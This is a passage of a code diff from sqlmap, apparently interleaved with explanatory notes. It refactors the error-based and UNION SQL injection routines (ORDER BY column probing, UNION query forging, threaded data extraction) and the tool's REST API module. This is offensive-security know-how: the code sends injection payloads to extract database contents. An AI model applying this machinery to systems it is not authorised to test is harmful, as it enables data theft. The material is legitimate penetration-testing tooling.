or extractRegexResult(trimcheck, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None)
|
||||
|
||||
if trimmed:
|
||||
if not chunkTest:
|
||||
@@ -205,8 +202,8 @@ def _oneShotErrorUse(expression, field=None, chunkTest=False):
|
||||
hashDBWrite(expression, retVal)
|
||||
|
||||
else:
|
||||
_ = "%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop)
|
||||
retVal = extractRegexResult(_, retVal, re.DOTALL | re.IGNORECASE) or retVal
|
||||
_ = "(?si)%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop)
|
||||
retVal = extractRegexResult(_, retVal) or retVal
|
||||
|
||||
return safecharencode(retVal) if kb.safeCharEncode else retVal
|
||||
|
||||
@@ -355,93 +352,94 @@ def errorUse(expression, dump=False):
|
||||
value = [] # for empty tables
|
||||
return value
|
||||
|
||||
if " ORDER BY " in expression and (stopLimit - startLimit) > SLOW_ORDER_COUNT_THRESHOLD:
|
||||
message = "due to huge table size do you want to remove "
|
||||
message += "ORDER BY clause gaining speed over consistency? [y/N] "
|
||||
if isNumPosStrValue(count) and int(count) > 1:
|
||||
if " ORDER BY " in expression and (stopLimit - startLimit) > SLOW_ORDER_COUNT_THRESHOLD:
|
||||
message = "due to huge table size do you want to remove "
|
||||
message += "ORDER BY clause gaining speed over consistency? [y/N] "
|
||||
|
||||
if readInput(message, default="N", boolean=True):
|
||||
expression = expression[:expression.index(" ORDER BY ")]
|
||||
if readInput(message, default="N", boolean=True):
|
||||
expression = expression[:expression.index(" ORDER BY ")]
|
||||
|
||||
numThreads = min(conf.threads, (stopLimit - startLimit))
|
||||
numThreads = min(conf.threads, (stopLimit - startLimit))
|
||||
|
||||
threadData = getCurrentThreadData()
|
||||
threadData = getCurrentThreadData()
|
||||
|
||||
try:
|
||||
threadData.shared.limits = iter(xrange(startLimit, stopLimit))
|
||||
except OverflowError:
|
||||
errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit)
|
||||
errMsg += "with switch '--fresh-queries'"
|
||||
raise SqlmapDataException(errMsg)
|
||||
try:
|
||||
threadData.shared.limits = iter(xrange(startLimit, stopLimit))
|
||||
except OverflowError:
|
||||
errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit)
|
||||
errMsg += "with switch '--fresh-queries'"
|
||||
raise SqlmapDataException(errMsg)
|
||||
|
||||
threadData.shared.value = BigArray()
|
||||
threadData.shared.buffered = []
|
||||
threadData.shared.counter = 0
|
||||
threadData.shared.lastFlushed = startLimit - 1
|
||||
threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1
|
||||
threadData.shared.value = BigArray()
|
||||
threadData.shared.buffered = []
|
||||
threadData.shared.counter = 0
|
||||
threadData.shared.lastFlushed = startLimit - 1
|
||||
threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1
|
||||
|
||||
if threadData.shared.showEta:
|
||||
threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit))
|
||||
if threadData.shared.showEta:
|
||||
threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit))
|
||||
|
||||
if kb.dumpTable and (len(expressionFieldsList) < (stopLimit - startLimit) > CHECK_ZERO_COLUMNS_THRESHOLD):
|
||||
for field in expressionFieldsList:
|
||||
if _oneShotErrorUse("SELECT COUNT(%s) FROM %s" % (field, kb.dumpTable)) == '0':
|
||||
emptyFields.append(field)
|
||||
debugMsg = "column '%s' of table '%s' will not be " % (field, kb.dumpTable)
|
||||
debugMsg += "dumped as it appears to be empty"
|
||||
logger.debug(debugMsg)
|
||||
if kb.dumpTable and (len(expressionFieldsList) < (stopLimit - startLimit) > CHECK_ZERO_COLUMNS_THRESHOLD):
|
||||
for field in expressionFieldsList:
|
||||
if _oneShotErrorUse("SELECT COUNT(%s) FROM %s" % (field, kb.dumpTable)) == '0':
|
||||
emptyFields.append(field)
|
||||
debugMsg = "column '%s' of table '%s' will not be " % (field, kb.dumpTable)
|
||||
debugMsg += "dumped as it appears to be empty"
|
||||
logger.debug(debugMsg)
|
||||
|
||||
if stopLimit > TURN_OFF_RESUME_INFO_LIMIT:
|
||||
kb.suppressResumeInfo = True
|
||||
debugMsg = "suppressing possible resume console info because of "
|
||||
debugMsg += "large number of rows. It might take too long"
|
||||
logger.debug(debugMsg)
|
||||
if stopLimit > TURN_OFF_RESUME_INFO_LIMIT:
|
||||
kb.suppressResumeInfo = True
|
||||
debugMsg = "suppressing possible resume console info because of "
|
||||
debugMsg += "large number of rows. It might take too long"
|
||||
logger.debug(debugMsg)
|
||||
|
||||
try:
|
||||
def errorThread():
|
||||
threadData = getCurrentThreadData()
|
||||
try:
|
||||
def errorThread():
|
||||
threadData = getCurrentThreadData()
|
||||
|
||||
while kb.threadContinue:
|
||||
with kb.locks.limit:
|
||||
try:
|
||||
valueStart = time.time()
|
||||
threadData.shared.counter += 1
|
||||
num = threadData.shared.limits.next()
|
||||
except StopIteration:
|
||||
while kb.threadContinue:
|
||||
with kb.locks.limit:
|
||||
try:
|
||||
valueStart = time.time()
|
||||
threadData.shared.counter += 1
|
||||
num = threadData.shared.limits.next()
|
||||
except StopIteration:
|
||||
break
|
||||
|
||||
output = _errorFields(expression, expressionFields, expressionFieldsList, num, emptyFields, threadData.shared.showEta)
|
||||
|
||||
if not kb.threadContinue:
|
||||
break
|
||||
|
||||
output = _errorFields(expression, expressionFields, expressionFieldsList, num, emptyFields, threadData.shared.showEta)
|
||||
if output and isListLike(output) and len(output) == 1:
|
||||
output = output[0]
|
||||
|
||||
if not kb.threadContinue:
|
||||
break
|
||||
with kb.locks.value:
|
||||
index = None
|
||||
if threadData.shared.showEta:
|
||||
threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter)
|
||||
for index in xrange(1 + len(threadData.shared.buffered)):
|
||||
if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num:
|
||||
break
|
||||
threadData.shared.buffered.insert(index or 0, (num, output))
|
||||
while threadData.shared.buffered and threadData.shared.lastFlushed + 1 == threadData.shared.buffered[0][0]:
|
||||
threadData.shared.lastFlushed += 1
|
||||
threadData.shared.value.append(threadData.shared.buffered[0][1])
|
||||
del threadData.shared.buffered[0]
|
||||
|
||||
if output and isListLike(output) and len(output) == 1:
|
||||
output = output[0]
|
||||
runThreads(numThreads, errorThread)
|
||||
|
||||
with kb.locks.value:
|
||||
index = None
|
||||
if threadData.shared.showEta:
|
||||
threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter)
|
||||
for index in xrange(1 + len(threadData.shared.buffered)):
|
||||
if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num:
|
||||
break
|
||||
threadData.shared.buffered.insert(index or 0, (num, output))
|
||||
while threadData.shared.buffered and threadData.shared.lastFlushed + 1 == threadData.shared.buffered[0][0]:
|
||||
threadData.shared.lastFlushed += 1
|
||||
threadData.shared.value.append(threadData.shared.buffered[0][1])
|
||||
del threadData.shared.buffered[0]
|
||||
except KeyboardInterrupt:
|
||||
abortedFlag = True
|
||||
warnMsg = "user aborted during enumeration. sqlmap "
|
||||
warnMsg += "will display partial output"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
runThreads(numThreads, errorThread)
|
||||
|
||||
except KeyboardInterrupt:
|
||||
abortedFlag = True
|
||||
warnMsg = "user aborted during enumeration. sqlmap "
|
||||
warnMsg += "will display partial output"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
finally:
|
||||
threadData.shared.value.extend(_[1] for _ in sorted(threadData.shared.buffered))
|
||||
value = threadData.shared.value
|
||||
kb.suppressResumeInfo = False
|
||||
finally:
|
||||
threadData.shared.value.extend(_[1] for _ in sorted(threadData.shared.buffered))
|
||||
value = threadData.shared.value
|
||||
kb.suppressResumeInfo = False
|
||||
|
||||
if not value and not abortedFlag:
|
||||
value = _errorFields(expression, expressionFields, expressionFieldsList)
|
||||
|
||||
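Both the error-based and UNION retrieval loops above share the same multi-threading pattern: each thread takes the next row index under a lock, and finished rows are parked in a small buffer kept sorted by index so output can be flushed strictly in order. A simplified single-process sketch of that buffering logic, assuming results arrive out of order:

```python
# Simplified sketch of the "buffered, flush-in-order" pattern used by the
# threaded error-based/UNION retrieval loops above (no real threads here).
def ordered_flush(results, start=0):
    buffered = []          # (row_index, value) pairs waiting for their turn
    last_flushed = start - 1
    value = []
    for num, output in results:                    # results may arrive out of order
        index = 0
        while index < len(buffered) and buffered[index][0] < num:
            index += 1
        buffered.insert(index, (num, output))      # keep the buffer sorted by row index
        while buffered and buffered[0][0] == last_flushed + 1:
            last_flushed, row = buffered.pop(0)    # flush only the next expected row
            value.append(row)
    return value

print(ordered_flush([(2, "b"), (0, "a"), (1, "x"), (3, "c")]))  # ['a', 'x', 'b', 'c']
```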
@@ -53,8 +53,8 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=
|
||||
query = agent.prefixQuery("ORDER BY %d" % cols, prefix=prefix)
|
||||
query = agent.suffixQuery(query, suffix=suffix, comment=comment)
|
||||
payload = agent.payload(newValue=query, place=place, parameter=parameter, where=where)
|
||||
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
|
||||
return not any(re.search(_, page or "", re.I) and not re.search(_, kb.pageTemplate or "", re.I) for _ in ("(warning|error):", "order by", "unknown column", "failed")) and comparison(page, headers) or re.search(r"data types cannot be compared or sorted", page or "", re.I)
|
||||
page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False)
|
||||
return not any(re.search(_, page or "", re.I) and not re.search(_, kb.pageTemplate or "", re.I) for _ in ("(warning|error):", "order by", "unknown column", "failed")) and comparison(page, headers, code) or re.search(r"data types cannot be compared or sorted", page or "", re.I)
|
||||
|
||||
if _orderByTest(1) and not _orderByTest(randomInt()):
|
||||
infoMsg = "'ORDER BY' technique appears to be usable. "
|
||||
@@ -105,10 +105,10 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=
|
||||
for count in xrange(lowerCount, upperCount + 1):
|
||||
query = agent.forgeUnionQuery('', -1, count, comment, prefix, suffix, kb.uChar, where)
|
||||
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
|
||||
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
|
||||
page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False)
|
||||
if not isNullValue(kb.uChar):
|
||||
pages[count] = page
|
||||
ratio = comparison(page, headers, getRatioValue=True) or MIN_RATIO
|
||||
ratio = comparison(page, headers, code, getRatioValue=True) or MIN_RATIO
|
||||
ratios.append(ratio)
|
||||
min_, max_ = min(min_, ratio), max(max_, ratio)
|
||||
items.append((count, ratio))
|
||||
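The hunk above feeds the HTTP status code into `comparison()` while probing candidate UNION column counts; each count yields a page whose similarity ratio against the original response is recorded, and the count whose ratio stands out is taken as the likely column count. A rough standalone sketch of that idea using difflib ratios and a mock set of responses (a simplification of the min/max ratio clustering in the hunk, not the exact algorithm):

```python
# Standalone sketch of ratio-based column-count detection: the candidate whose
# response is the clear outlier (most/least similar) is the likely column count.
import difflib

def outlier_count(original, responses):
    ratios = {count: difflib.SequenceMatcher(None, original, page).ratio()
              for count, page in responses.items()}
    mean = sum(ratios.values()) / len(ratios)
    # Pick the candidate furthest from the average ratio
    return max(ratios, key=lambda count: abs(ratios[count] - mean))

responses = {
    1: "Unknown column '2' in 'order clause'",
    2: "Unknown column '3' in 'order clause'",
    3: "Welcome back, admin NULL NULL NULL",   # UNION with 3 columns "fits"
}
print(outlier_count("Unknown column 'x' in 'order clause'", responses))  # 3
```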
@@ -187,7 +187,7 @@ def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLO
|
||||
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
|
||||
|
||||
# Perform the request
|
||||
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
|
||||
page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False)
|
||||
content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \
|
||||
removeReflectiveValues(listToStrValue(headers.headers if headers else None), \
|
||||
payload, True) or "")
|
||||
@@ -209,7 +209,7 @@ def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLO
|
||||
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
|
||||
|
||||
# Perform the request
|
||||
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
|
||||
page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False)
|
||||
content = "%s%s".lower() % (page or "", listToStrValue(headers.headers if headers else None) or "")
|
||||
|
||||
if not all(_ in content for _ in (phrase, phrase2)):
|
||||
@@ -222,7 +222,7 @@ def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLO
|
||||
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
|
||||
|
||||
# Perform the request
|
||||
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
|
||||
page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False)
|
||||
content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \
|
||||
removeReflectiveValues(listToStrValue(headers.headers if headers else None), \
|
||||
payload, True) or "")
|
||||
|
||||
@@ -81,7 +81,7 @@ def _oneShotUnionUse(expression, unpack=True, limited=False):
|
||||
payload = agent.payload(newValue=query, where=where)
|
||||
|
||||
# Perform the request
|
||||
page, headers = Request.queryPage(payload, content=True, raise404=False)
|
||||
page, headers, _ = Request.queryPage(payload, content=True, raise404=False)
|
||||
|
||||
incrementCounter(PAYLOAD.TECHNIQUE.UNION)
|
||||
|
||||
@@ -284,126 +284,127 @@ def unionUse(expression, unpack=True, dump=False):
|
||||
value = [] # for empty tables
|
||||
return value
|
||||
|
||||
threadData = getCurrentThreadData()
|
||||
if isNumPosStrValue(count) and int(count) > 1:
|
||||
threadData = getCurrentThreadData()
|
||||
|
||||
try:
|
||||
threadData.shared.limits = iter(xrange(startLimit, stopLimit))
|
||||
except OverflowError:
|
||||
errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit)
|
||||
errMsg += "with switch '--fresh-queries'"
|
||||
raise SqlmapDataException(errMsg)
|
||||
try:
|
||||
threadData.shared.limits = iter(xrange(startLimit, stopLimit))
|
||||
except OverflowError:
|
||||
errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit)
|
||||
errMsg += "with switch '--fresh-queries'"
|
||||
raise SqlmapDataException(errMsg)
|
||||
|
||||
numThreads = min(conf.threads, (stopLimit - startLimit))
|
||||
threadData.shared.value = BigArray()
|
||||
threadData.shared.buffered = []
|
||||
threadData.shared.counter = 0
|
||||
threadData.shared.lastFlushed = startLimit - 1
|
||||
threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1
|
||||
numThreads = min(conf.threads, (stopLimit - startLimit))
|
||||
threadData.shared.value = BigArray()
|
||||
threadData.shared.buffered = []
|
||||
threadData.shared.counter = 0
|
||||
threadData.shared.lastFlushed = startLimit - 1
|
||||
threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1
|
||||
|
||||
if threadData.shared.showEta:
|
||||
threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit))
|
||||
if threadData.shared.showEta:
|
||||
threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit))
|
||||
|
||||
if stopLimit > TURN_OFF_RESUME_INFO_LIMIT:
|
||||
kb.suppressResumeInfo = True
|
||||
debugMsg = "suppressing possible resume console info because of "
|
||||
debugMsg += "large number of rows. It might take too long"
|
||||
logger.debug(debugMsg)
|
||||
if stopLimit > TURN_OFF_RESUME_INFO_LIMIT:
|
||||
kb.suppressResumeInfo = True
|
||||
debugMsg = "suppressing possible resume console info because of "
|
||||
debugMsg += "large number of rows. It might take too long"
|
||||
logger.debug(debugMsg)
|
||||
|
||||
try:
|
||||
def unionThread():
|
||||
threadData = getCurrentThreadData()
|
||||
try:
|
||||
def unionThread():
|
||||
threadData = getCurrentThreadData()
|
||||
|
||||
while kb.threadContinue:
|
||||
with kb.locks.limit:
|
||||
try:
|
||||
valueStart = time.time()
|
||||
threadData.shared.counter += 1
|
||||
num = threadData.shared.limits.next()
|
||||
except StopIteration:
|
||||
while kb.threadContinue:
|
||||
with kb.locks.limit:
|
||||
try:
|
||||
valueStart = time.time()
|
||||
threadData.shared.counter += 1
|
||||
num = threadData.shared.limits.next()
|
||||
except StopIteration:
|
||||
break
|
||||
|
||||
if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
|
||||
field = expressionFieldsList[0]
|
||||
elif Backend.isDbms(DBMS.ORACLE):
|
||||
field = expressionFieldsList
|
||||
else:
|
||||
field = None
|
||||
|
||||
limitedExpr = agent.limitQuery(num, expression, field)
|
||||
output = _oneShotUnionUse(limitedExpr, unpack, True)
|
||||
|
||||
if not kb.threadContinue:
|
||||
break
|
||||
|
||||
if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
|
||||
field = expressionFieldsList[0]
|
||||
elif Backend.isDbms(DBMS.ORACLE):
|
||||
field = expressionFieldsList
|
||||
else:
|
||||
field = None
|
||||
if output:
|
||||
with kb.locks.value:
|
||||
if all(_ in output for _ in (kb.chars.start, kb.chars.stop)):
|
||||
items = parseUnionPage(output)
|
||||
|
||||
limitedExpr = agent.limitQuery(num, expression, field)
|
||||
output = _oneShotUnionUse(limitedExpr, unpack, True)
|
||||
if threadData.shared.showEta:
|
||||
threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter)
|
||||
if isListLike(items):
|
||||
# in case that we requested N columns and we get M!=N then we have to filter a bit
|
||||
if len(items) > 1 and len(expressionFieldsList) > 1:
|
||||
items = [item for item in items if isListLike(item) and len(item) == len(expressionFieldsList)]
|
||||
items = [_ for _ in flattenValue(items)]
|
||||
if len(items) > len(expressionFieldsList):
|
||||
filtered = OrderedDict()
|
||||
for item in items:
|
||||
key = re.sub(r"[^A-Za-z0-9]", "", item).lower()
|
||||
if key not in filtered or re.search(r"[^A-Za-z0-9]", item):
|
||||
filtered[key] = item
|
||||
items = filtered.values()
|
||||
items = [items]
|
||||
index = None
|
||||
for index in xrange(1 + len(threadData.shared.buffered)):
|
||||
if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num:
|
||||
break
|
||||
threadData.shared.buffered.insert(index or 0, (num, items))
|
||||
else:
|
||||
index = None
|
||||
if threadData.shared.showEta:
|
||||
threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter)
|
||||
for index in xrange(1 + len(threadData.shared.buffered)):
|
||||
if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num:
|
||||
break
|
||||
threadData.shared.buffered.insert(index or 0, (num, None))
|
||||
|
||||
if not kb.threadContinue:
|
||||
break
|
||||
items = output.replace(kb.chars.start, "").replace(kb.chars.stop, "").split(kb.chars.delimiter)
|
||||
|
||||
if output:
|
||||
with kb.locks.value:
|
||||
if all(_ in output for _ in (kb.chars.start, kb.chars.stop)):
|
||||
items = parseUnionPage(output)
|
||||
while threadData.shared.buffered and (threadData.shared.lastFlushed + 1 >= threadData.shared.buffered[0][0] or len(threadData.shared.buffered) > MAX_BUFFERED_PARTIAL_UNION_LENGTH):
|
||||
threadData.shared.lastFlushed, _ = threadData.shared.buffered[0]
|
||||
if not isNoneValue(_):
|
||||
threadData.shared.value.extend(arrayizeValue(_))
|
||||
del threadData.shared.buffered[0]
|
||||
|
||||
if threadData.shared.showEta:
|
||||
threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter)
|
||||
if isListLike(items):
|
||||
# in case that we requested N columns and we get M!=N then we have to filter a bit
|
||||
if len(items) > 1 and len(expressionFieldsList) > 1:
|
||||
items = [item for item in items if isListLike(item) and len(item) == len(expressionFieldsList)]
|
||||
items = [_ for _ in flattenValue(items)]
|
||||
if len(items) > len(expressionFieldsList):
|
||||
filtered = OrderedDict()
|
||||
for item in items:
|
||||
key = re.sub(r"[^A-Za-z0-9]", "", item).lower()
|
||||
if key not in filtered or re.search(r"[^A-Za-z0-9]", item):
|
||||
filtered[key] = item
|
||||
items = filtered.values()
|
||||
items = [items]
|
||||
index = None
|
||||
for index in xrange(1 + len(threadData.shared.buffered)):
|
||||
if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num:
|
||||
break
|
||||
threadData.shared.buffered.insert(index or 0, (num, items))
|
||||
else:
|
||||
index = None
|
||||
if threadData.shared.showEta:
|
||||
threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter)
|
||||
for index in xrange(1 + len(threadData.shared.buffered)):
|
||||
if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num:
|
||||
break
|
||||
threadData.shared.buffered.insert(index or 0, (num, None))
|
||||
if conf.verbose == 1 and not (threadData.resumed and kb.suppressResumeInfo) and not threadData.shared.showEta:
|
||||
_ = ','.join("\"%s\"" % _ for _ in flattenValue(arrayizeValue(items))) if not isinstance(items, basestring) else items
|
||||
status = "[%s] [INFO] %s: %s" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", _ if kb.safeCharEncode else safecharencode(_))
|
||||
|
||||
items = output.replace(kb.chars.start, "").replace(kb.chars.stop, "").split(kb.chars.delimiter)
|
||||
if len(status) > width:
|
||||
status = "%s..." % status[:width - 3]
|
||||
|
||||
while threadData.shared.buffered and (threadData.shared.lastFlushed + 1 >= threadData.shared.buffered[0][0] or len(threadData.shared.buffered) > MAX_BUFFERED_PARTIAL_UNION_LENGTH):
|
||||
threadData.shared.lastFlushed, _ = threadData.shared.buffered[0]
|
||||
if not isNoneValue(_):
|
||||
threadData.shared.value.extend(arrayizeValue(_))
|
||||
del threadData.shared.buffered[0]
|
||||
dataToStdout("%s\n" % status)
|
||||
|
||||
if conf.verbose == 1 and not (threadData.resumed and kb.suppressResumeInfo) and not threadData.shared.showEta:
|
||||
_ = ','.join("\"%s\"" % _ for _ in flattenValue(arrayizeValue(items))) if not isinstance(items, basestring) else items
|
||||
status = "[%s] [INFO] %s: %s" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", _ if kb.safeCharEncode else safecharencode(_))
|
||||
runThreads(numThreads, unionThread)
|
||||
|
||||
if len(status) > width:
|
||||
status = "%s..." % status[:width - 3]
|
||||
if conf.verbose == 1:
|
||||
clearConsoleLine(True)
|
||||
|
||||
dataToStdout("%s\n" % status)
|
||||
except KeyboardInterrupt:
|
||||
abortedFlag = True
|
||||
|
||||
runThreads(numThreads, unionThread)
|
||||
warnMsg = "user aborted during enumeration. sqlmap "
|
||||
warnMsg += "will display partial output"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
if conf.verbose == 1:
|
||||
clearConsoleLine(True)
|
||||
|
||||
except KeyboardInterrupt:
|
||||
abortedFlag = True
|
||||
|
||||
warnMsg = "user aborted during enumeration. sqlmap "
|
||||
warnMsg += "will display partial output"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
finally:
|
||||
for _ in sorted(threadData.shared.buffered):
|
||||
if not isNoneValue(_[1]):
|
||||
threadData.shared.value.extend(arrayizeValue(_[1]))
|
||||
value = threadData.shared.value
|
||||
kb.suppressResumeInfo = False
|
||||
finally:
|
||||
for _ in sorted(threadData.shared.buffered):
|
||||
if not isNoneValue(_[1]):
|
||||
threadData.shared.value.extend(arrayizeValue(_[1]))
|
||||
value = threadData.shared.value
|
||||
kb.suppressResumeInfo = False
|
||||
|
||||
if not value and not abortedFlag:
|
||||
output = _oneShotUnionUse(expression, unpack)
|
||||
|
||||
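The unionThread() logic above is easier to see outside the diff: each thread retrieves a batch of rows tagged with its row number (`num`), inserts the batch into `threadData.shared.buffered` at the position that keeps the list sorted, and batches are flushed into `threadData.shared.value` only while the head of the buffer is contiguous with `lastFlushed` (or the buffer exceeds `MAX_BUFFERED_PARTIAL_UNION_LENGTH`), so partial output stays in row order even though threads finish out of order. A minimal standalone sketch of that ordering scheme, with simplified names and a made-up cap instead of sqlmap's internals:

```python
# Illustrative sketch only: a simplified stand-in for the ordered buffering
# done in unionThread(); class/function names and the cap value are assumptions.
MAX_BUFFERED = 1024

class Shared(object):
    def __init__(self):
        self.buffered = []      # list of (num, items), kept sorted by row number
        self.lastFlushed = -1   # highest row number already flushed
        self.value = []         # final output, in row order

def push(shared, num, items):
    # insert at the position that keeps 'buffered' sorted by row number
    index = 0
    for index in range(1 + len(shared.buffered)):
        if index < len(shared.buffered) and shared.buffered[index][0] >= num:
            break
    shared.buffered.insert(index, (num, items))

    # flush the head while it is contiguous with what was already flushed
    # (or the buffer has grown past the cap)
    while shared.buffered and (shared.lastFlushed + 1 >= shared.buffered[0][0] or len(shared.buffered) > MAX_BUFFERED):
        shared.lastFlushed, head = shared.buffered[0]
        if head is not None:
            shared.value.extend(head)
        del shared.buffered[0]

shared = Shared()
for num, row in [(2, ["c3"]), (0, ["c1"]), (1, ["c2"])]:   # rows arrive out of order
    push(shared, num, [row])
print(shared.value)   # [['c1'], ['c2'], ['c3']]
```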
150
lib/utils/api.py
@@ -7,6 +7,7 @@ See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
import contextlib
|
||||
import httplib
|
||||
import logging
|
||||
import os
|
||||
import re
|
||||
@@ -43,6 +44,7 @@ from lib.core.settings import RESTAPI_DEFAULT_ADDRESS
|
||||
from lib.core.settings import RESTAPI_DEFAULT_PORT
|
||||
from lib.core.subprocessng import Popen
|
||||
from lib.parse.cmdline import cmdLineParser
|
||||
from thirdparty.bottle.bottle import abort
|
||||
from thirdparty.bottle.bottle import error as return_error
|
||||
from thirdparty.bottle.bottle import get
|
||||
from thirdparty.bottle.bottle import hook
|
||||
@@ -52,13 +54,13 @@ from thirdparty.bottle.bottle import response
|
||||
from thirdparty.bottle.bottle import run
|
||||
from thirdparty.bottle.bottle import server_names
|
||||
|
||||
|
||||
# global settings
|
||||
# Global data storage
|
||||
class DataStore(object):
|
||||
admin_id = ""
|
||||
current_db = None
|
||||
tasks = dict()
|
||||
|
||||
username = None
|
||||
password = None
|
||||
|
||||
# API objects
|
||||
class Database(object):
|
||||
@@ -70,7 +72,7 @@ class Database(object):
|
||||
self.cursor = None
|
||||
|
||||
def connect(self, who="server"):
|
||||
self.connection = sqlite3.connect(self.database, timeout=3, isolation_level=None)
|
||||
self.connection = sqlite3.connect(self.database, timeout=3, isolation_level=None, check_same_thread=False)
|
||||
self.cursor = self.connection.cursor()
|
||||
logger.debug("REST-JSON API %s connected to IPC database" % who)
|
||||
|
||||
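The only functional change in the connect() hunk is the added `check_same_thread=False`, which allows the single IPC connection to be used from threads other than the one that opened it. A minimal standard-library sketch of that pattern (the file name and the explicit lock are assumptions, not part of the diff):

```python
import sqlite3
import threading

# One shared connection for a small IPC-style database; check_same_thread=False
# permits use from other threads, so access is serialized with a lock instead.
connection = sqlite3.connect("ipc.db", timeout=3, isolation_level=None, check_same_thread=False)
cursor = connection.cursor()
lock = threading.Lock()

def execute(statement, arguments=()):
    with lock:
        cursor.execute(statement, arguments)
        return cursor.fetchall()

execute("CREATE TABLE IF NOT EXISTS logs(id INTEGER PRIMARY KEY AUTOINCREMENT, message TEXT)")
execute("INSERT INTO logs VALUES(NULL, ?)", ("written from any thread",))
print(execute("SELECT message FROM logs"))
```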
@@ -118,7 +120,6 @@ class Database(object):
|
||||
"taskid INTEGER, error TEXT"
|
||||
")")
|
||||
|
||||
|
||||
class Task(object):
|
||||
def __init__(self, taskid, remote_addr):
|
||||
self.remote_addr = remote_addr
|
||||
@@ -232,34 +233,26 @@ class StdDbOut(object):
|
||||
# Ignore all non-relevant messages
|
||||
return
|
||||
|
||||
output = conf.databaseCursor.execute(
|
||||
"SELECT id, status, value FROM data WHERE taskid = ? AND content_type = ?",
|
||||
(self.taskid, content_type))
|
||||
output = conf.databaseCursor.execute("SELECT id, status, value FROM data WHERE taskid = ? AND content_type = ?", (self.taskid, content_type))
|
||||
|
||||
# Delete partial output from IPC database if we have got a complete output
|
||||
if status == CONTENT_STATUS.COMPLETE:
|
||||
if len(output) > 0:
|
||||
for index in xrange(len(output)):
|
||||
conf.databaseCursor.execute("DELETE FROM data WHERE id = ?",
|
||||
(output[index][0],))
|
||||
conf.databaseCursor.execute("DELETE FROM data WHERE id = ?", (output[index][0],))
|
||||
|
||||
conf.databaseCursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)",
|
||||
(self.taskid, status, content_type, jsonize(value)))
|
||||
conf.databaseCursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)", (self.taskid, status, content_type, jsonize(value)))
|
||||
if kb.partRun:
|
||||
kb.partRun = None
|
||||
|
||||
elif status == CONTENT_STATUS.IN_PROGRESS:
|
||||
if len(output) == 0:
|
||||
conf.databaseCursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)",
|
||||
(self.taskid, status, content_type,
|
||||
jsonize(value)))
|
||||
conf.databaseCursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)", (self.taskid, status, content_type, jsonize(value)))
|
||||
else:
|
||||
new_value = "%s%s" % (dejsonize(output[0][2]), value)
|
||||
conf.databaseCursor.execute("UPDATE data SET value = ? WHERE id = ?",
|
||||
(jsonize(new_value), output[0][0]))
|
||||
conf.databaseCursor.execute("UPDATE data SET value = ? WHERE id = ?", (jsonize(new_value), output[0][0]))
|
||||
else:
|
||||
conf.databaseCursor.execute("INSERT INTO errors VALUES(NULL, ?, ?)",
|
||||
(self.taskid, str(value) if value else ""))
|
||||
conf.databaseCursor.execute("INSERT INTO errors VALUES(NULL, ?, ?)", (self.taskid, str(value) if value else ""))
|
||||
|
||||
def flush(self):
|
||||
pass
|
||||
